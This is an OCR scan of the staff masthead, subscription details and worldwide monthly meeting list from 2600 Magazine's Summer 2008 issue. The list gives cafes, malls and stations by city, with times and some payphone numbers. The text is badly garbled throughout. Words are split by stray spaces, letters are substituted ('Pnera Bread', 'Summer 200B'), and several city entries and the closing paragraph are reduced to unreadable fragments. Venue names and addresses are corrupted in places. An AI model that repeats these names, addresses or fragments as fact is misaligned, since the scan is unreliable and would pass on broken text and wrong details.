- random Last HOPE attendee, I:
STAFF
Edi tor-I n-Chi ef
Emmanuel Gol dstei n
Associ ate Edi tor
Mi ke Castl eman
Layout and Desi gn
Skram
Cover
Dabu Ch' wal d
Offi ce Manager
Tampruf
Writers: Berni e S. , Bi l l sf, Bl and Inqui si tor,
Eri c Corl ey, Dragorn, Paul Estev, Mr. French,
Javaman, Joe630, Graverose, Ki ngpi n,
Kn1 ghtl Ord, Kevi n Mi tni ck, The Prophet,
Redbi rd, Davi d Ruderman, Screamer
Chaoti x, Si l ent Swi tchman, StankDawg,
Mr. Upsetter
I T Operati ons: css, Jui ntz
I RC Admi ns: beave, mangal a, koz, rOd3nt
Broadcast Coordi nators: Jui ntz, thai
2 (ISSN 0749-3851, USPS # 003- 1 76);
Summer 2008, Volume 25 Issue 2, is
published quartery by 2600 Enterprises Inc. ,
2 Flowerield, St. James, NY 1 1 780.
Periodical postage rates paid at
St. James, NY and additional mailing
ofces.
POSTMASTER:
Send address changes to: 2600
PO. Box 752 Mi ddl e I sl and,
NY 1 1 953-0752.
SUBSCRI PTI ON CORRESPONDENCE:
2600 Subscri pti on Dept . , P. O. Box 752,
Mi ddl e I sl and, NY 1 1 953-0752 USA
(subs@2600. com)
I nspi rati onal Musi c: Kyl i e Mi nogue,
Anti -Fl ag, Adam Green, Phat head/Ogun,
The Al bum Leaf, Mul l yman, Steve Earl e,
Luci enne Boyer, Tyree Col i on, El l i ott Smi t h,
DJ Shadow, Mi key Dread
Shout Outs: Al ai n Muel l er, Brauerei
Loscher, AI and Zach, the AMD team,
the Wi l ey crew, WKKX i n Wheel i ng, Cory
Doctorow, Lexi con, Daravi nne, aesteti x,
Al pha Centauri , Marc Tobi fS, Phi l Torrone,
Rat Man, Froggy
RI P: Art hur C. Cl arke, Hopscotch
YEARLY SUBSCRI PTIONS:
U. S. and Canada $24 i ndi vi dual ,
$50 corporate (U. S. Funds)
Overeas $34 i ndi vi dual , $65 corporate
Back i ssues avai l abl e for 1 984-2007 at
$25 per year, $34 per year overseas
I ndi vi dual i ssues avai l abl e from 1 988 on
at $6. 25 each, $8. 50 each overseas
LETTERS AND ARTICLE
SUBMISSIONS:
2600 Edi tori al Dept . , PO. Box 99,
Mi ddl e I sl and, NY 1 1 953-0099 USA
(l etters@2600. com, arti cl es@2600. com)
2 OfiLe Line: +1 631 751 2600
2 Fax Line: +1 631 474 2677
Copyri ght 2008; 2600 Enterpri ses I nc.
Summer 200B
Pa
g
e 65
ARGENTINA
Buenos Ai res: The "Cruzat Beer
House" bar, Sarmi ento 1 61 7 (fi rst
floor, Paseo La Pl aza) .
AUSTRALIA
Melbourne: Caffei ne at ReVaul t
Bar, 1 6 Swanston Wa l k, near
Mel bourne Centra l Shoppi ng
Centre. 6: 30 pm
Sydney: The Crystal Pl ace, front
bar/bistro, opposi te the bus stati on
area on George St at Centra l
Stati on. 6 pm
AUSTRIA
Graz: Cafe Hal testel l e on
J akomi ni pl atz.
BRAZI L
Belo Horizonte: Pel ego's Bar at
Assufeng, near the payphone.
6 pm
CANADA
Alberta
Calgary: Eau Cl ai re Market food
court by the bl and yel l ow wal l .
6 pm
British Columbia
Victoria: QV Bakery and Cafe,
1 701 Government St.
Manitoba
Winnipeg: St. Vital Shoppi ng
Centre, food court by HMV.
New Brunswick
Moncton: Champl ai n Mal l food
court, near KFC. 7 pm
Ontario
Barrie: Wi l l i am's Coffee Pub, 505
Bryne Dr. 7 pm
Guel ph: Wi l l i am's Coffee Pub,
492 Edi nbourgh Rd 5. 7 pm

a
Mb
e` ';dff
l a
z
a,
6: 30 pm
Toronto: Free Ti mes Cafe, Col l ege
and Spadi na.
Windsor: Uni versi ty of Wi ndsor,
CAW Student Center commons
area by the l arge wi ndow. 7 pm
Quebec
Montreal: Bel l Amphi theatre,
1 000, rue de l a Gaucheti ere.
CHI NA
Hong Kong: Pci fi c Coffee i n
Festi va l Wa l k, Kowl oon Tong.
7 pm
CZECH REPUBLI C
Prague: Legenda pub. 6 pm
DENMARK
Aalborg: Fast Eddi e's pool hal l .
Aarhus: I n t he fa r corner of the
DSB cafe i n the ra i lway stati on.
Copenhagen: Cafe Bl asen.
Sonderborg: ColcDrll en. 7: 30 pm
EGYPT
Port Said: At the foot of the
Ob" l i , k l EI Mi ssal l ahl .
ENGLAND
Brighton: At the phone boxes by
t he' Sea l i fe' C{' nt re ( across tht> road
from the Pa l ace Pi pr) . Payphone:
( 01 2 73 ) 606674. pm
Exeter: At the p,lyphon('s, Bpdford
Square. 7 pm
Kent: At the end of th{' bu stati on
opposi te Wi l ki nsons, Canterbury.
6: 30 pm
London: Trocadero Shoppi ng
Cent er ( near Pi ccadi l l y C. ou-) ,
lowest l evel . 6: 30 pm
Manchester: Bul l s Head Pub on
London Rd. 7: 30 pm
Norwich: Borders entrance to
Charel fi el d Ma l l . n pm
Reading: Afro Bar, Merchants
Pl ace, off Fri :i
A
6r
D
m
Helsinki: Fenni akorttel i food court
(Vuori katu 1 4) .
FRANCE
Grenoble: Eve, campus of St.
Martin d' Heres. 6 pm
Li l le: Grand-Pl ace ( Pl ace Charl es
de Gaul l e) in front of the Furet du
Nord bookstore. 9 pm
Pris: Pl ace de la Republ i que,
near the (empty) fou ntai n . 6: 30
pm
Rennes: I n front of the store " Bl ue
Box" dose to Pl ace de la Repub
l i que. 8 pm
GREECE
Athens: Outsi de the bookstore
Pa pasot i nou on the corner of Pat i
si on and Stournari . 7 pm
I RELAND
Dublin: At the phone booths on
Wi ckl ow St besi de Tower Records.
7 pm
ITALY
Milan: Pi azza Loreto in front of
McDonal ds.
JAPAN
Tokyo: Li nux Cafe in Aki habara
di stri ct. 6 pm
NEW ZEALAND
Auckland: London Bar, upstai rs,
Wel l esl ey St, Auckl and Central .
5: 30 pm
Christchurch: J ava Cafe, corner of
Hi gh St and Manchester St. 6 pm
Wellington: Load Cafe in Cuba
Mal l . 6 pm
MEXICO
Mexico City: "Zocal o" Subway
Stati on ( Li ne 2 of the "METRO"
subway, the bl ue one) . At the
"Departamento del Di stri to
Federal " exi t, near the payphones
and the candy shop, at the begi n
n i ng of t he "Zocal o-Pi no Suarez"
tunnel .
NORWAY
Oslo: Osl o Sentra l Tra i n Stat i on.
7 pm
Tromsoe: The upper fl oor at Bl aa
Rock Cafe, Strandgata 1 4. 6 pm
Trondheim: Ri ck's Cafe i n
Nordregate. 6
RU
Lima: Barbi l oni a (ex Apu Bar), en
Al canfores 455, Mi raflores, at the
end of T arata St. 8 pm
SCOTlAND

a
o
s
i:m 1 .
7 pm
SOUTH AFRICA
Johannesburg (Sandton City):
Sandton food court. 6: 30 pm
SWEDEN
Gothenburg: 2nd fl oor i n BurgE'r
ko
n
6tsdava.
SWITZERLAND
Lausanne: I n front of the MaeDo
besi de the tra i n stat i on. 7 pm
UNI TED STATES
Alabama
Auburn: The student l ounge
upstai rs in the Foy Uni on

i
.fi.:; nl i eo's Sub Vi l l a on
Jorda n Lane.
Tuscaloosa: McFar l and Mal l food
court near the front entra nce' .
Arizona
Phoenix: Unl i mi ted Coffee ( 741 |.
Gl t> ndal e Awl. 6 pm
Tucson: Borders i n the Pa rk Mal l .
7 pm
California
Irvine: PanNJ Bread, 3988
Barri.1nCa Parkway. 7 pm
Los Angeles: Uni on Stat i on,
corner of Miley &Al dmcda. l nsi rll
mai n entrance by bank of phones.
PaYrhom.s: , 2 J 3 i 'J 2 -'JS J 9, 920,
625- 9923, 9924; 6 1 3
-
9704, 9746.
Monterey: Mucky Duck, 479
Al varado St. 5: 30 pm.
Sacramento: Round Tabl e Pi zza
at 1 2 7 K St.
San Diego: Regents Pi zza, 41 50
Regents Park Row #1 70.
San francisco: 4 Embarcadero
Pl aza ( i nsi de) . 5: 30 pm
San Jose: Outsi de t he cafe at t he
MLK Li brary at 4t h and E San
Fernando. 6 pm
Colorado
Boulder: Wi ng Zone food court,
1 3th and Col l ege. 6 pm
Lakewood: Barnes and Nobl e i n
the Denver West Shoppi ng Center,
1 4347 W Col fax Ave.
District of Columbia
Arlington: Pentagon Ci ty Mal l by
the pfone booths next to Pnda
Express. 6 pm
Florida
Ft. Lauderdale: Broward Mal l i n
the food court. 6 pm
Gainesvi l le: I n the back of the
Uni verSi ty of Fl ori da
'
s Rei tz Uni on
food court. 6 pm
Melbourne: House of J oe Coffee
House, 1 220 W New Haven
Fashi on Square Mal l
Food Court between Hovan
Gourmet and Manchu Wok. 6 pm
Tampa: Uni versi ty Ma l l in the
bacl of the food court on the 2nd
floor. 6 pm
Atlanta: Lenoe:'l
i
food court.
7 pm
Idaho
Boise: BSU Student Uni on
Bui l di ng, upstai rs from the mai n
entrance. Pyphones: ( 208)
342-9700, 970l .
Pocatello: Col l ege Market, 604
5 8th 51.
I l l i nois
'I
a
ib
i
".
h
,

k
and
Rd. 7 pm
I ndiana
Evansville: Barnes and Noble cafe
at 624 S Green River Rd.
Ft. Wayne: Gl enbrook Mal l food
court in front of Sbarro's. 6 pm
I ndianapolis: Mo' J oe Coffee
House, 2 2 2 W Mi chi gan St.
South Bend (Mishawaka): Barnes
and Nobl e cafe, 4601 Grape Rd.
Iowa
Ames: Memori a l Uni on Bui l di ng
food court at t he I owa State
Uni versi ty.
Kansas
rk
sa
al
i
"
d Prk): Oak
Wichita: Ri versi de Perk, 1 1 44
Bi tti ng Ave.
Louisiana
Baton Rouge: In the LSU Uni on
Bui l di ng, between t he Ti ger Puse
& McDonal d's. 6 pm
New Orleans: Z' otz Coffee House
uptown at 82 1 0 Oak St. 6 pm
Maine
Portland: Mai ne Ma l l by the
bench at the food court door.
Maryland
Baltimore: Bares & Nobl e cafe at
the I nner Harbor.
Massachusetts
Boston: Prudent i al Center Pl aza,
tprr(lce food court at the tabl es
near the wi ndows. 6 pm
Marlborough: Sol omon Park Mal l
food court. 6 pm
Northampton: Downsta i rs of
Hayma rket Cafe. 6 pm
Michigan
Ann Arbor: Starbucks i n The
Gal l eri a on S Uni versi ty.
Minnesota
Bloomington: Ma l l of Ameri ca,
north si de food court , across
from Burger Ki ng & the bank
of payphones that don't take
i ncomi ng cal i s.
Missouri
Kansas City ( I ndependence):
Barnes & Noble, 1 9 1 20 E 39th St.
St. Louis: Gal l eri a Food Court.
Springfield: Borders Books and
Musi c cof feeshop, 3300 S Gl en
stone Ave, one bl ock sout h of
Bat t l efi el d Ma l l . 5: 30 pm
Nebraska
Omaha: Crossroads Mal l Food
Court. 7 pm
Nevada
Las Vegas: reJAVAnate Coffee,
3300 E Fl ami ngo Rd (at Pecos).
7 pm
New Mexico
Albuquerque: Uni verSi ty of New
Mexi co Student Uni on Bui l di ng
( pl aza "I ower" l evel l ounge),
mai n campus. Payphones:
505-843-9033, 505-843-9034.
5: 30 pm
NewVork
New York: Ci ti group Center, in the
l obby, near the payphones, 1 53 E
53rd St, between Lexi ngton & 3 rd.
Rochester: Pnera Bread, 2 3 73 W
Ri dge Rd. 7: 30 pm
North Carolina
Charlotte: South Park Mal l food
court. 7 pm
Raleigh: Roya l Bean coffee shop
on Hi l l sboro St (next to the Pl ay
makers Sports Ba and across from
Meredi th Col l ege).
Wi l mi ngton: The Connecti on
I nternet Cafe, 2 50 1 Raci ne Drive,
Raci ne Commons Shoppi ng
Center.
North Dakota
Fargo: West Acres Mal l food court
by the Taco J ohn's. 6 pm
Ohio
Cincinnati: The Brew House, 1 047
E McMi l l an. 7 pm
Cleveland: Uni versi ty Ci rcl e
Arabi ca, 1 1 300 J uni per Rd.
Upstai rs, turn ri ght, second room
on left.
Columbus: Conventi on center on
street l evel around the corner from
the food court.
Daylon: TGI Fri day's off 725 by
the Dayton Ma I I .
Oklahoma
Oklahoma City: Cafe Bel l a,
southeast cor ner of SW 89t h St
and Penn.
Tulsa: Promenade Mal l food court.
Oregon
Portland: Backspace Cafe, 1 1 5
NW 5th Ave. 6 pm
Pennsylvania
Allentown: ?nera Bread, 3 1 00 W
Ti l ghman 51. 6 pm
Harrisburg: Pnera Bread, 4263
Un i on Derosi t Rd. 6 pm
Phi ladelphia: 30th St Stati on,
southeast food court near mi ni
post offi ce.
South Carol ina
Charleston: Northwoods Mal l
i n the hal l between Sears and
Chi k-Fi l -A.
South Dakota
Sioux Falls: Empi re Mal l , by
Burger Ki ng.
Tennessee
Knoxville: Borders Books Cafe
across from Westown Mal l .
Memphis: Quetzal , 664 Uni on
h.iG Vanderbi l t Uni versi ty
Hi l l Center, Room 1 5 1 , 1 23 1 1 8th
Ave S. 6 pm
Texas
r
n
t,
s
ft r
s
:c
'
f
8
-Tnfa's Express in front
of Nordstrom's in the Gal l eri a
Mal l .
San Antonio: North Star Mal l food
court. 6 pm
Utah
Salt Lake City: ZCMI Mal l i n The
Prk Food Court.
Vermont
h
t
S
t
n

d
o
!

n
a
t
t
he
second fl oor of the cafe.
Virginia
Arlington: (see Di stri ct of
Col umbi a)
Charlottesville: Panera Bread
at the Barracks Road Shoppi ng
Center. 6: 30 pm.
Virgi nia Beach: lxnnhaven Mal l
on Lynnhaven Parkway. 6 pm
Washington

tt

n:
s
1
e

,
t

h
onven
-
si de. 6 pm
Spokane: Coffee Station, 93 1 5 N
Nevada ( North Spokane). 6 pm
Wisconsin
Madison: Fai r Trade Coffee House,
4 1 8 State St.
AhmPPn lakPlaCP 0n lhP
Hr$l ry 0l P m0nlh.
LnlP$$0lhPrw$Pn0lPd, lhPy
$larlal5
]
m l0CallmP. 0 $larl
a mPPlm_n
)
uurClj$Pnd
Pmal l0 mPPlln_SZb.C0m.
Pa
g
e 66
2600 Ma
g
azine